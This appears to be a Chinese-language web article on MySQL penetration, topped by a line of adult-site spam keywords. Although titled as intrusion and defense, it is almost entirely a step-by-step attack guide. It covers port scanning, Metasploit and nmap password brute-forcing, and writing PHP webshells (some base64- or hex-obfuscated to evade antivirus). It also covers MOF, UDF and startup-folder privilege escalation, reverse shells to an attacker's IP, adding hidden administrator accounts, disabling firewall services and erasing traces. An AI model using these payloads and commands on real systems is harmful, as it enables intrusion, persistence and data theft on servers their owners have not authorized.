精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

教你一些MySQL數據庫入侵及防御方法

數據庫 MySQL 數據庫運維
在研究 MySQL 數據庫安全之余,我們也對 MySQL 如何通過 msf、sqlmap 等來進行掃描、漏洞利用、提權、MySQL 密碼破解和獲取 webshell 等進行了詳細研究。

[[233652]]

在針對網站滲透中,很多都是跟 MySQL 數據庫有關,各種 MySQL 注入、MySQL 提權、MySQL 數據庫 Root 賬號 webshell 獲取等,但沒有一個對 MySQL 數據庫滲透較為全面的總結。

針對這種情況我們開展了研究,但技術的進步永無止境,思想有多遠,路就可以走多遠,在研究 MySQL 數據庫安全之余,我們也對 MySQL 如何通過 msf、sqlmap 等來進行掃描、漏洞利用、提權、MySQL 密碼破解和獲取 webshell 等進行了詳細研究。

一、MySQL 信息收集

1、端口信息收集

MySQL 默認端口是 3306 端口,但也有自定義端口,針對默認端口掃描主要利用掃描軟件進行探測,推薦使用:

  • iisputter,直接填寫 3306 端口,IP 地址填寫單個或者 C 段地址;
  • Nmap 掃描 Nmap -p 3306 192.168.1.1-254。

特定目標的滲透,可能需要對全端口進行掃描,可以使用 Nmap 對某一個 IP 地址進行全端口掃描,端口掃描軟件還有 sfind 等 DOS 下掃描的工具。

2、版本信息收集

msf 查看版本信息“auxiliary/scanner/mysql/mysql_version”模塊

以掃描主機 192.168.157.130 為例,命令為:

 

  1. use auxiliary/scanner/mysql/mysql_version  
  2. set rhosts 192.168.157.130  
  3. run 

 

MySQL 查詢版本命令:

 

  1. SELECT @@version、SELECT  version(); 

sqlmap 通過注入點掃描確認信息:

 

  1. sqlmap.py -u url --dbms mysql 

phpmyadmin 管理頁面登錄后查看 localhost->變量->服務器變量和設置中的 version 參數值。

3、數據庫管理信息收集

MySQL 管理工具有多種,例如 phpmyadmin 網站管理,Navicat for MySQL 以及 MySQL Front 等客戶端工具。這些工具有的會直接保存配置信息,這些信息包含數據庫服務器地址和數據庫用戶名以及密碼,通過嗅探或者破解配置文件可以獲取密碼等信息。

4、msf 信息收集模塊

MySQL 哈希值枚舉:

 

  1. use auxiliary/scanner/mysql/mysql_hashdump  
  2. set username root  
  3. set password root  
  4. run 

 

獲取相關信息:

 

  1. use auxiliary/admin/mysql/mysql_enum  
  2. set username root  
  3. set password root  
  4. run 

 

獲取數據庫版本,操作系統名稱,架構,數據庫目錄,數據庫用戶以及密碼哈希值。

執行 MySQL 語句,連接成功后可以在 msf 執行 SQL 語句,跟 sqlmap 的“--sql-shell”模塊類似

 

  1. use auxiliary/admin/mysql/mysql_sql 

將mysql_schem導出到本地/root/.msf4/loot/文件夾下

 

  1. use auxiliary/scanner/mysql/mysql_schemadump 

文件枚舉和目錄可寫信息枚舉

 

  1. auxiliary/scanner/mysql/mysql_file_enum  
  2. auxiliary/scanner/mysql/mysql_writable_dirs 

 

沒有測試成功過,需要定義枚舉目錄和相關文件,覺得基本沒什么用。

二、MySQL 密碼獲取

1、暴力破解

MySQL 暴力破解主要有幾種:

網頁在線連接破解:

可以使用 burpsuite 和 phpMyAdmin 多線程批量破解工具。

下載:

  • https://portswigger.net/burp/
  • http://pan.baidu.com/s/1c1LD6co

msf 通過命令行進行暴力破解:

msf 破解 MySQL 密碼模塊 auxiliary/scanner/mysql/mysql_login,其參數主要有BLANK_PASSWORDS、BRUTEFORCE_SPEED、DB_ALL_CREDS、DB_ALL_PASS、DB_ALL_USERS、PASSWORD、PASS_FILE、Proxies、RHOSTS、RPORT、STOP_ON_SUCCESS、THREADS、USERNAME、USERPASS_FILE、USER_AS_PASS、USER_FILE、VERBOSE參數。

對單一主機僅僅需要設置 RHOSTS、RPORT、USERNAME、PASSWORD 和 PASS_FILE,其它參數根據實際情況進行設置。

場景A:對內網獲取 Root 某個口令后,擴展滲透

 

  1. use auxiliary/scanner/mysql/mysql_login  
  2. set RHOSTS 192.168.157.1-254  
  3. set password root  
  4. set username root  
  5. run 

 

執行后對 192.168.157.1-254 進行 MySQL 密碼掃描驗證。

場景B:使用密碼字典進行掃描

 

  1. use auxiliary/scanner/mysql/mysql_login  
  2. set RHOSTS 192.168.157.1-254  
  3. set pass_file /tmp/password.txt  
  4. set username root  
  5. run 

使用 nmap 掃描并破解密碼:

對某一個 IP 或者 IP 地址段進行 nmap 默認密碼暴力破解并掃描

 

  1. nmap --script=mysql-brute 192.168.157.130  
  2. nmap --script=mysql-brute 192.168.157.1-254 

 

使用 Root 賬號 Root 密碼進行 MySQL 密碼驗證并掃描獲取指定 IP 地址的端口信息以及 MySQL 數據庫相關信息

 

  1. nmap -sV --script=mysql-databases --script-argsmysqluser=root,mysqlpass=root 192.168.157.130 

檢查 Root 空口令

  1. nmap --script mysql-empty-password 192.168.195.130 

對 MySQL 口令進行掃描:

使用 hscan 工具對 MySQL 口令進行掃描,需要設置掃描 IP 地址段以及數據庫口令字典及用戶名字典。

2、源代碼泄露

網站源代碼備份文件:

一些網站源代碼文件中會包含數據庫連接文件,通過查看這些文件可以獲取數據庫賬號和密碼。一般常見的數據庫連接文件為 config.php、web.config、conn.asp、db.php/asp、jdbc.properties、sysconfig.properties、JBOSS_HOME\docs\examples\jca\XXXX-ds.xml。以前有一款工具挖掘雞可以自定義網站等名稱對 zip/rar/tar/tar.gz/gz/sql 等后綴文件進行掃描。

配置備份文件:

使用 ultraedit 等編輯文件編輯數據庫配置文件后,會留下 bak 文件。

3、文件包含

本地文件包含漏洞可以包含文件,通過查看文件代碼獲取數據庫配置文件,進而讀取數據庫用戶名和密碼。

4、其它情況

有些軟件會將 IP 地址、數據庫用戶名和密碼寫進程序中,運行程序后,通過 cain 軟件進行嗅探,可以獲取數據庫密碼。另外 MySQL客戶端管理工具有的管理員會建立連接記錄,這些連接記錄保存了用戶名、密碼和連接 IP 地址或者主機名,通過配置文件或者嗅探可以獲取用戶名和密碼。

三、MySQL 獲取 webshell

1、phpmyadminroot 賬號獲取 webshell

MySQL Root 賬號通過 phpMyAdmin 獲取 webshell 的思路,主要有下面幾種方式,以第1)2)6)8)方法較佳,其它可以根據實際情況來進行。

1)直接讀取后門文件:

通過程序報錯、phpinfo 函數、程序配置表等直接獲取網站真實路徑,有些網站前期已經被人滲透過,因此在目錄下留有后門文件通過 load_file 直接讀取。

2)直接導出一句話后門:

前提需要知道網站的真實物理路徑,例如呼求偶真實路徑 D:\work\WWW,則可以通過執行以下查詢,來獲取一句話后門文件 cmd.php,訪問地址:http://www.somesite.com/cmd.php

 

  1. select '<?php @eval($_POST[antian365]);?>'INTO OUTFILE 'D:/work/WWW/antian365.php' 

3)創建數據庫導出一句話后門:

在查詢窗口直接執行以下代碼即可,跟2)原理類似

 

  1. CREATE TABLE `mysql`.`antian365` (`temp` TEXT NOTNULL );  
  2. INSERT INTO `mysql`.`antian365` (`temp` ) VALUES('<?php @eval($_POST[antian365]);?>');  
  3. SELECT `tempFROM `antian365` INTO OUTFILE'D:/www/antian365.php' 
  4. DROP TABLE IF EXISTS `antian365`; 

4)可執行命令方式:

創建執行命令形式的 Shell,但前提是對方未關閉系統函數。該方法導出成功后可以直接執行 DOS 命令,使用方法:www.xxx.com/antian365.php?cmd=(cmd=后面直接執行dos命令)

 

  1. select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'd:/www/antian365.php' 

另外在 Linux 下可以導出直接執行命令的 Shell

 

  1. SELECT '<? system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php'
  2. http://localhost/shell.php?c=cat%20/etc/passwd

5)過殺毒軟件方式:

通過后臺或者存在上傳圖片的地方,上傳圖片 publicguide.jpg,內容如下

 

  1. <?php$a=' PD9waHAgQGV2YWwoJF9QT1NUWydhbnRpYW4zNjUnXSk7ZGllKCk7Pz4=';error_reporting(0);@set_time_limit(0);eval("?>".base64_decode($a));?> 

然后通過圖片包含 temp.php,導出 webshell

 

  1. select '<?php include 'publicguide.jpg' ?>'INTO OUTFILE 'D:/work/WWW/antian365.php' 

一句話后門密碼:antian365

6)直接導出加密 webshell:

一句話后門文件密碼:pp64mqa2x1rnw68,執行以下查詢直接導出加密 webshell,D:/WEB/IPTEST/22.php,注意在實際過程需要修改 D:/WEB/IPTEST/22.php

 

  1. select unhex('203C3F7068700D0A24784E203D2024784E2E737562737472282269796234327374725F72656C6750383034222C352C36293B0D0A246C766367203D207374725F73706C697428226D756B3961773238776C746371222C36293B0D0A24784E203D2024784E2E73756273747228226C396364706C616365704172424539646B222C342C35293B0D0A246A6C203D2073747269706F732822657078776B6C3766363674666B74222C226A6C22293B0D0A2474203D2024742E737562737472282274514756325957774A63567534222C312C36293B0D0A2465696137203D207472696D28226A386C32776D6C34367265656E22293B0D0A2462203D2024622E73756273747228226B6261736536346B424474394C366E6D222C312C36293B0D0A246967203D207472696D28226233397730676E756C6922293B0D0A2479203D2024792E24784E28227259222C22222C22637259726572596122293B0D0A24797531203D207374725F73706C697428226269316238376D3861306F3678222C32293B0D0A2474203D2024742E24784E282278413678222C22222C2277784136786F4A463922293B0D0A246E64203D2073747269706F7328226E363574383872786E303265646A336630222C226E6422293B0D0A2462203D2024622E24784E282277493339222C22222C225F774933396477493339656322293B0D0A2468387073203D207374725F73706C697428226B6E396A3968346D6877676633666A6970222C33293B0D0A2479203D2024792E7375627374722822687974655F66756E775669535645344A222C322C36293B0D0A24796637203D207374726C656E282275656875343967367467356B6F22293B0D0A2474203D2024742E24784E28226670222C22222C22516670546670314E667022293B0D0A246D39203D207374726C656E282265756C363034636F626B22293B0D0A2462203D2024622E73756273747228226C3057316F64656C413165536E454A222C342C33293B0D0A2468306277203D207472696D28226E33653568306371746F6B76676F6238747822293B0D0A2479203D2024792E24784E28227962222C22222C2263796274696F22293B0D0A24733761203D20727472696D2822617565627963396734743564386B22293B0D0A2474203D2024742E7375627374722822624D73306E4268383355577964222C392C34293B0D0A2464353971203D2073747269706F732822636A7675636B6F79357766336F746561222C226435397122293B0D0A2479203D2024792E73756273747228226E4439487851534C386E6752222C392C31293B0D0A246C31203D207374725F73706C697428226167717130396762716E31222C34293B0D0A2474203D2024742E24784E282277366F34222C22222C2277634477366F345977366F343022293B0D0A247079203D2073747269706F7328226C677938687472727631746333222C22707922293B0D0A2474203D2024742E24784E282265503332222C22222C22625846655033326822293B0D0A2478703364203D2073747269706F732822756B6C306E626E7839677433222C227870336422293B0D0A2474203D2024742E7375627374722822696B4A3030484A4D6E677863222C372C35293B0D0A2464743262203D207374726C656E282265346135616275616A7733766C6369726122293B0D0A2474203D2024742E737562737472282263644E314B78656D35334E776D456838364253222C372C34293B0D0A2475626A203D207374726C656E28227767686A6E6674326F70356B7831633038367422293B0D0A2474203D2024742E73756273747228226D34616F7864756A676E58536B63784C344657635964222C372C36293B0D0A247178203D207374726C656E2822726C71666B6B6674726F3867666B6F37796122293B0D0A2474203D2024742E7375627374722822723779222C312C31293B0D0A246D75203D20727472696D28226E676478777578357671653122293B0D0A246A203D2024792822222C20246228247429293B0D0A24626E6C70203D207374726C656E28227675667930616B316679617622293B0D0A24736468203D207374725F73706C69742822776D6E6A766733633770306D222C34293B0D0A246D62203D206C7472696D28226E353270317067616570656F6B6622293B0D0A2465307077203D20727472696D28227575346D686770356339706E613465677122293B0D0A24756768203D207472696D282272637064336F3977393974696F3922293B0D0A246772636B203D207374726C656E2822783572697835627031786B793722293B0D0A24656F3674203D207374726C656E282264646931683134656375797563376422293B246A28293B0D0A2464766E71203D207374725F73706C6974282270726D36676968613176726F333630346175222C38293B0D0A24756738203D20727472696D28226563387735327375706234767538656F22293B0D0A24726374203D2073747269706F73282268786536776F37657764386D65376474222C2272637422293B0D0A24656B7166203D207374725F73706C69742822707266357930386538666C6666773032356A38222C38293B0D0A24767972203D207374725F73706C69742822756D706A63737266673668356E64366F3435222C39293B0D0A24777266203D20727472696D282266797839396F3739333868377567716822293B0D0A24713134203D207374726C656E2822746334366F73786C3173743169633222293B0D0A66756E6374696F6E206F2820297B2020207D3B0D0A24757366203D207374726C656E2822666C7463707862377466626A736D7422293B0D0A3F3E'into dumpfile 'D:/WEB/IPTEST/22.php' 

注意:也可以使用 http://tool.lu/hexstr/ 網站的代碼轉換來實現,將需要導出的文件代碼復制到網站的字符串中,通過字符串轉成十六進制,將十六進制字符串放入 unhex 函數進行查詢即可

  1. select unhex('十六進制字符串'into dumpfile 'D:/WEB/shell.php' 

7)CMS 系統獲取 webshell:

有些情況下無法獲取網站的真實路徑,則意味著無法直接導出一句話 webshell,可以通過 CMS 系統管理賬號登錄系統后,尋找漏洞來突破,例如 dedecms 可以通過破解管理員賬號后直接上傳文件來獲取 webshell。Discuz!的 UC_key 可以直接獲取 webshell。甚至某些系統可直接上傳 php 文件。下面是一些 CMS 系統滲透的技巧:

dedecms 系統的密碼有直接 md5,也有20位的密碼,如果是20位的密碼則需要去掉密碼中的前3位和最后1位,然后對剩余的值進行md5解密即可;

phpcms v9 版本的密碼需要加 salt 進行破解,需要選擇破解算法 md5(md5($pass).$salt) 進行破解;

Discuz!論壇帳號保存在 ucenter_members(Discuz7.X及以上版本)或者cdb_members(discuz6.x版本)表中,其破解需要帶salt進行,其破解時是使用password:salt進行,例如 a0513df9929afc972f024fa4e586e829:399793。

8)general_log_file 獲取 webshell:

查看 genera 文件配置情況

 

  1. show global variables like "%genera%"

關閉 general_log

 

  1. set global general_log=off

通過 general_log 選項來獲取 webshell

 

  1. set global general_log='on' 
  2. SET global general_log_file='D:/phpStudy/WWW/cmd.php'

 

在查詢中執行語句

 

  1. SELECT '<?php assert($_POST["cmd"]);?>'

Shell 為 cmd.php,一句話后門,密碼為cmd。

2、Sqlmap 注入點獲取 webshell

Sqlmap 注入點獲取 webshell 的前提是具備寫權限,一般是 Root 賬號,通過執行命令來獲取

 

  1. sqlmap -u url--os-shell 
  2.  
  3.   echo "<?php @eval($_POST['c']);?>" >/data/www/1.php 

四、MySQL 提權

1、mof提權

webshell 上傳 mof 文件提權:

MySQL Root 權限 MOF 方法提權是來自國外 Kingcope 大牛發布的 MySQL Scanner & MySQL Server for Windows Remote SYSTEM Level Exploit(https://www.exploit-db.com/exploits/23083/),簡稱 MySQL 遠程提權 0day(MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day)。Windows 管理規范 (WMI) 提供了以下三種方法編譯到 WMI 存儲庫的托管對象格式 (MOF) 文件:

  • 方法1:運行 MOF 文件指定為命令行參數 Mofcomp.exe 文件;
  • 方法2:使用 IMofCompiler 接口和 $ CompileFile 方法;
  • 方法3:拖放到 %SystemRoot%\System32\Wbem\MOF 文件夾的 MOF 文件。

Microsoft 建議您到存儲庫編譯 MOF 文件使用前兩種方法。也就是運行 Mofcomp.exe 文件,或使用 IMofCompiler::CompileFile 方法。第三種方法僅為向后兼容性與早期版本的 WMI 提供,并因為此功能可能不會提供在將來的版本后,不應使用。注意使用 MOF 方法提權的前提是當前 Root 帳號可以復制文件到 %SystemRoot%\System32\Wbem\MOF 目錄下,否則會失敗!

該漏洞的利用前提條件是必須具備 MySQL 的 Root 權限,在 Kingcope 公布的 0day 中公布了一個 pl 利用腳本。

 

  1. perl mysql_win_remote.pl 192.168.2.100 root "" 192.168.2.150 5555 

192.168.2.100 為 MySQL 數據庫所在服務器,MySQL 口令為空,反彈到 192.168.2.150 的 5555 端口上。

生成 nullevt.mof 文件:

將以下代碼保存為nullevt.mof文件:

 

  1. #pragma namespace("\\\\.\\root\\subscription")   
  2. instance of __EventFilter as $EventFilter  
  3. {   
  4. EventNamespace = "Root\\Cimv2";   
  5. Name  = "filtP2";   
  6.     Query = "Select * From __InstanceModificationEvent "   
  7.             "Where TargetInstance Isa \"Win32_LocalTime\" "   
  8.             "And TargetInstance.Second = 5";   
  9. QueryLanguage = "WQL";   
  10. };   
  11. instance of ActiveScriptEventConsumer as $Consumer   
  12. {   
  13.     Name = "consPCSV2";   
  14. ScriptingEngine = "JScript";   
  15. ScriptText =   
  16.     "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add")";   
  17. };   
  18. instance of __FilterToConsumerBinding  
  19. {   
  20.     Consumer   = $Consumer;   
  21.     Filter = $EventFilter;   
  22. }; 

 

通過 MySQL 查詢將文件導入:

執行以下查詢語句,將上面生成的 nullevt.mof 導入到 c:\windows\system32\wbem\mof\ 目錄下在windows7 中默認是拒絕訪問的。導入后系統會自動運行,執行命令

 

  1. selectload_file('C:\\RECYCLER\\nullevt.mof'into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'

msf 直接 mof 提權:

msf 下的 exploit/windows/mysql/mysql_mof 模塊提供了直接 mof 提權,不過該漏洞成功跟操作系統權限和 MySQL 數據庫版本有關,執行成功后會直接反彈 Shell 到 meterpreter

 

  1. use exploit/windows/mysql/mysql_mof  
  2. set rhost 192.168.157.1 //設置需要提權的遠程主機IP地址  
  3. set rport 3306 //設置mysql的遠程端口  
  4. set password root //設置mysql數據庫root密碼  
  5. set username root //設置mysql用戶名  
  6. options //查看設置 
  7. run 0 

技巧:要是能夠通過網頁連接管理(phpmyadmin),則可以修改 host 為“%”并刷新權限后,則可以通過 msf 等工具遠程連接數據庫。默認 Root 等賬號不允許遠程連接,除非管理員或者數據庫用戶自己設置。

方法1:本地登入 MySQL,更改 "MySQL" 數據庫里的 "user" 表里的 "host" 項,將"localhost"改為"%"

 

  1. use mysql;  
  2.  update user set host = '%' where user = 'root' 
  3. FLUSH PRIVILEGES ;  
  4.  select host, user from user

方法2:直接授權(推薦)

從任何主機上使用 Root 用戶,密碼:youpassword(你的root密碼)連接到 MySQL 服務器

 

  1. # mysql -u root -proot  
  2. GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'youpassword' WITH GRANT OPTION 
  3. FLUSH PRIVILEGES

推薦重新增加一個用戶,在實際測試過程中發現很多服務器使用 Root 配置了多個地址,修改后可能會影響實際系統的運行。在實際測試過程中因此建議新增一個用戶,授權所有權限,而不是直接更改 Root 配置。

2、udf 提權

UDF 提權是利用 MySQL 的自定義函數功能,將 MySQL 賬號轉化為系統 system 權限,利用條件的目標系統是 Windows(Win2000/XP/2003);擁有 MySQL 的某個用戶賬號,此賬號必須有對 MySQL 的 insert 和 delete 權限以創建和拋棄函數,有 Root 賬號密碼Windows 下 UDF 提權對于 Windows2008 以下服務器比較適用,也即針對 Windows2000、Windows2003 的成功率較高。

UDF 提權條件:

  • MySQL 版本大于 5.1 版本 udf.dll 文件必須放置于 MySQL 安裝目錄下的 lib\plugin 文件夾下。
  • MySQL 版本小于 5.1 版本。udf.dll 文件在 Windows2003 下放置于 c:\windows\system32,在 Windows2000 下放置于 c:\winnt\system32。
  • 掌握的 MySQL 數據庫的賬號有對 MySQL 的 insert 和 delete 權限以創建和拋棄函數,一般以 Root 賬號為佳,具備 Root 賬號所具備的權限的其它賬號也可以。
  • 可以將 udf.dll 寫入到相應目錄的權限。

提權方法:

獲取數據庫版本、數據位置以及插件位置等信息

 

  1. select version();//獲取數據庫版本  
  2. select user();//獲取數據庫用戶  
  3. select @@basedir ;//獲取安裝目錄  
  4. show variables like '%plugins%';  //尋找mysql安裝路徑 

 

導出路徑

 

  1. C:\Winnt\udf.dll    Windows 2000  
  2. C:\Windows\udf.dll   Windows2003(有的系統被轉義,需要改為C:Windowsudf.dll) 

MySQL 5.1 以上版本,必須要把 udf.dll 文件放到 MySQL 安裝目錄下的 libplugin 文件夾下才能創建自定義函數。該目錄默認是不存在的,這就需要我們使用 webshell 找到 MySQL 的安裝目錄,并在安裝目錄下創建 libplugin 文件夾,然后將 udf.dll 文件導出到該目錄即可。

在某些情況下,我們會遇到 Can't open shared library 的情況,這時就需要我們把 udf.dll 導出到 lib\plugin 目錄下才可以,網上大牛發現利用 NTFS ADS 流來創建文件夾的方法

 

  1. select @@basedir;  //查找到mysql的目錄  
  2. select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION';   //利用NTFS ADS創建lib目錄  
  3. select 'It is dll' into d 
  4. umpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';//利用NTFS ADS創建plugin目錄

執行成功以后就會 plugin 目錄,然后再進行導出 udf.dll 即可。

創建 cmdshell 函數,該函數叫什么名字在后續中則使用該函數進行查詢

 

  1. create function cmdshell returns string soname ‘lib_mysqludf_sys.dll’; 

執行命令

 

  1. select sys_eval(‘whoami’); 

一般情況下不會出現創建不成功哦。連不上 3389 可以先停止 windows 防火墻和篩選

 

  1. select sys_eval(‘net stop policyagent’);  
  2. select sys_eval(‘net stop sharedaccess’); 

 

udf.dll 下常見函數

cmdshell  執行cmd;

downloader  下載者,到網上下載指定文件并保存到指定目錄;

open3389    通用開3389終端服務,可指定端口(不改端口無需重啟);

backshell   反彈Shell;

ProcessView 枚舉系統進程;

KillProcess 終止指定進程;

regread     讀注冊表;

regwrite    寫注冊表;

shut        關機,注銷,重啟;

about       說明與幫助函數;

具體用戶示例

 

  1. select cmdshell('net user iis_user 123!@#abcABC /add');  
  2. select cmdshell('net localgroup administrators iis_user /add');  
  3. select cmdshell('regedit /s d:web3389.reg');  
  4. select cmdshell('netstat -an'); 

 

清除痕跡

 

  1. drop function cmdshell;//將函數刪除 

刪除 udf.dll 文件以及其它相關入侵文件及日志。

常見錯誤

 

  1. #1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement  
  2. SHOW VARIABLES LIKE "secure_file_priv" 

 

在 my.ini 或者 mysql.cnf  文件中注銷 (使用#號) 包含 secure_file_priv 的行。

 

  1. 1123 - Can't initialize function 'backshell'; UDFs are unavailable with the --skip-grant-tables option,需要將 my.ini 中的 skip-grant-tables 選項去掉。 

webshell 下 udf 提權:

通過集成 udf 提權的 webshell 輸入數據庫用戶名及密碼以及數據庫服務器地址或者IP通過連接后導出進行提權。

MySQL 提權綜合利用工具:

v5est0r 寫了一個 MySQL 提權綜合利用工具,詳細情況請參考其代碼共享網站:https://github.com/v5est0r/Python_FuckMySQL,其主要功能有:

  • 自動導出你的 backdoor 和 mof 文件;
  • 自動判斷 MySQL 版本,根據版本不同導出 UDF 的 DLL 到不同目錄,UDF 提權;
  • 導出 LPK.dll 文件,劫持系統目錄提權;
  • 寫啟動項提權。

UdF 自動提權

 

  1. python root.py -a 127.0.0.1 -p root -e "ver&whoami" -m udf 

LPK 劫持提權

 

  1. python root.py -a 127.0.0.1 -p root -e "ver&whoami" -m lpk 

啟動項提權

 

  1. python root.py -a 127.0.0.1 -p root -e "ver&whoami" –mst 

例如通過 LOAD_FILE 來查看 MySQL 配置文件 my.ini,如果其中配置了 skip-grant-tables,這無法進行提權。

3、無法獲取 webshell 提權

連接 MySQL:

  1. mysql.exe -h ip -uroot -p  
  2. phpmyadmin  
  3. Navicat for MySQL 

 

查看數據庫版本和數據路徑:

 

  1. SELECT VERSION( );  
  2. Select @@datadir; 

 

5.1 以下版本,將 dll 導入到 c:/windows 或者 c:/windows/system32/

5.1 以上版本 通過以下查詢來獲取插件路徑

 

  1. SHOW VARIABLES WHERE Variable_Name LIKE "%dir" 
  2. show variables like '%plugin%' ;  
  3. select load_file('C:/phpStudy/Apache/conf/httpd.conf' 
  4. select load_file('C:/phpStudy/Apache/conf/vhosts.conf' 
  5. select load_file('C:/phpStudy/Apache/conf/extra/vhosts.conf' 
  6. select load_file('C:/phpStudy/Apache/conf/extra/httpd.conf' 
  7. select load_file('d:/phpStudy/Apache/conf/vhosts.conf'

修改 MySQL.txt:

MySQL.txt 為 udf.dll 的二進制文件轉成十六進制代碼。

  • 先執行導入 ghost 表中的內容,修改以下代碼的末尾代碼:select backshell("YourIP",4444);
  • 導出文件到某個目錄

導出過程:

 

  1. select data from Ghost into dumpfile 'c:/windows/mysqldll.dll';   
  2. select data from Ghost into dumpfile 'c:/windows/system32/mysqldll';   
  3. select data from Ghost into dumpfile 'c:/phpStudy/MySQL/lib/plugin/mysqldll';   
  4. select data from Ghost into dumpfile 'E:/PHPnow-1.5.6/MySQL-5.0.90/lib/plugin/mysqldll';   
  5. select data from Ghost into dumpfile 'C:/websoft/MySQL/MySQL Server 5.5/lib/plugin/mysqldll.dll'   
  6. select data from Ghost into dumpfile 'D:/phpStudy/MySQL/lib/plugin/mysqldll.dll';   
  7. C:\ProgramData\MySQL\MySQL Server 5.1\Data\mysql/user.myd  
  8. select load_file('C:/ProgramData/MySQL/MySQL Server 5.1/Data/mysql/user.frm');  
  9. select data from Ghost into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib/plugin/mysqldll.dll' 

 

  • 查看 FUNCTION 中是否存在 cmdshell 和 backshell,存在則刪除

 

  1. drop FUNCTION cmdshell;//刪除cmdshell  
  2. drop FUNCTION backshell;//刪除backshell 

 

  • 創建backshell
  1. CREATE FUNCTION backshell RETURNS STRING SONAME 'mysqldll.dll'; //創建backshell 
  • 在具備獨立主機的服務器上執行監聽
  1. nc -vv -l -p 44444 
  • 執行查詢

 

  1. select backshell("192.192.192.1",44444);//修改192.192.192.1為你的IP和端口 

獲取 webshell 后添加用戶命令:

注意如果不能直接執行,則需要到 c:\windows\system32\ 下執行

 

  1. net user antian365 Www.Antian365.Com /add   
  2. net localgroup administrators antian365 

4、Sqlmap 直連數據庫提權

Sqlmap 直接連接數據庫提權,需要有寫入權限和 Root 賬號及密碼,命令如下:

  • 連接數據庫:sqlmap.py -d "mysql://root:123456@219.115.1.1:3306/mysql" --os-shell
  • 選擇操作系統的架構,32 位操作系統選擇 1,64 位選擇 2
  • 自動上傳 udf 或提示 os-shell
  • 執行 whomai 命令如果獲取系統權限,則表示提權成功。

Msfudf 提權:

Kali 滲透測試平臺下執行(kali下載地址https://www.kali.org/downloads/)

 

  1. msfconsole  
  2. use exploit/windows/mysql/mysql_payload  
  3. options  
  4. set rhost 192.168.2.1  
  5. set rport 3306  
  6. set username root  
  7. set password 123456  
  8. run 0或者exploit 

msf 下 udf 提權成功率并不高,跟 windows 操作系統版本,權限和數據庫版本有關,特別是 secure-file-priv 選項,如果有該選項基本不會成功。

5、啟動項提權

創建表并插入 vbs 腳本到表中:

依次使用以下命令

show databases ;

 

  1. use test;  
  2. show tables;  
  3. create table a (cmd text);  
  4. insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );  
  5. insert into a values ("a=wshshell.run (""cmd.exe /c net user aspnetaspnettest/add"",0)") ;  
  6. insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators aspnet /add"",0) " );  
  7. select * from a; 

 

導出 vbs 腳本到啟動:

使用以下命令將剛才在 a 表中創建的 vbs 腳本導出到啟動選項中

 

  1. select * from a into outfile "C:\\Documents and Settings\\All Users\\「開始」菜單\\程序\\啟動\\a.vbs"

導入成功后,系統重新啟動時會自動添加密碼為“1”且用戶名稱為“1”的用戶到管理員組中。在實際使用過程中該腳本成功執行的幾率比較低,有時候會出現不能導出的錯誤。

推薦使用以下腳本

 

  1. show databases ;  
  2. use test;  
  3. show tables;  
  4. create table b (cmd text);  
  5. insert into b values ("net user Aspnet123545345!* /add");  
  6. insert into b values ("net localgroup administrators Aspnet /add");  
  7. insert into b values ("del b.bat");  
  8. select * from b into outfile "C:\\Documents and Settings\\All Users\\「開始」菜單\\程序\\啟動\\b.bat"

 

該腳本執行后雖然會閃現 DOS 窗口,如果有權限導入到啟動選項中,則一定會執行成功,在虛擬機中通過 MySQL 連接器連接并執行以上命令后,在“C:\Documents and Settings\All Users\「開始」菜單\程序\啟動”目錄中會有剛才導出的 b.bat 腳本文件。

說明:在不同的操作系統中“C:\Documents and Settings\All Users\「開始」菜單\程序\啟動”目錄文件名稱可能會不同,這個時候就要將其目錄換成相應的目錄名稱即可。例如如果是英文版本操作系統則其插入的代碼為

 

  1. select * from b into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\b.bat"

Windows 2008 Server的啟動目錄為:C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\iis.vbs

其 vbs 方法可以參考如下寫法

 

  1. create table a (cmd text);  
  2. insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );  
  3. insert into a values ("a=wshshell.run (""cmd.exe /c net user antian365 qwer1234!@# /add"",0) " );  
  4. insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators antian365 /add"",0) " );  
  5. select * from a into outfile "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\iis.vbs"

msf 下模塊 exploit/windows/mysql/mysql_start_up 提權:       

  1. use exploit/windows/mysql/mysql_start_up  
  2. set rhost 192.168.2.1  
  3. set rport 3306  
  4. set username root  
  5. set password 123456  
  6. run 

 

msf 下 mysql_start_up 提權有一定的幾率,對英文版系統支持較好。

五、msf 其它相關漏洞提權

1、MySQL 身份認證漏洞及利用(CVE-2012-2122)

當連接 MariaDB/MySQL 時,輸入的密碼會與期望的正確密碼比較,由于不正確的處理,會導致即便是 memcmp() 返回一個非零值,也會使 MySQL 認為兩個密碼是相同的。也就是說只要知道用戶名,不斷嘗試就能夠直接登入 SQL 數據庫。按照公告說法大約 256 次就能夠蒙對一次。受影響的產品: 

  • All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 存在漏洞
  • MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 不存在漏洞
  • MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not 不存在漏洞

use auxiliary/scanner/mysql/mysql_authbypass_hashdump

2、exploit/windows/mysql/mysql_yassl_hello

3、exploit/windows/mysql/scrutinizer_upload_exec

